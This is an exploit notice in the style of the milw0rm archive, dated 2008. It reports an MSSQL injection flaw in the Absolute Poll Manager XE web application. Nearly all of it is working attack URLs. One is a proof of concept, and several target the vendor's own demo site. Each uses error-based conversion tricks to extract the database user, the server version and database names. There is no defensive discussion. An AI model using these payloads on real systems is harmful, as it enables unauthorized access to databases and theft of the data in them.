29 lines
No EOL
1.2 KiB
Text
29 lines
No EOL
1.2 KiB
Text
###############################################################################################
|
|
# Author : Hakxer
|
|
# Home : Www.educ-up.com
|
|
# Type Gap : Sql injection --((MSSQL Injection))--
|
|
# script : Absolute Poll Manager XE [see script] http://www.xigla.com/absolutepm/demo.htm
|
|
# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002
|
|
# TM : EgY Coders
|
|
#################################################################################################
|
|
|
|
### POC
|
|
www.site.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))
|
|
|
|
### Exploit :
|
|
|
|
http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+@@version))
|
|
|
|
http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))
|
|
|
|
http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(1)))
|
|
|
|
http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(2)))
|
|
|
|
http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(3)))
|
|
|
|
###############################################################################
|
|
|
|
-------------------------------- The End of Gap -----------------------------------
|
|
|
|
# milw0rm.com [2008-10-11] |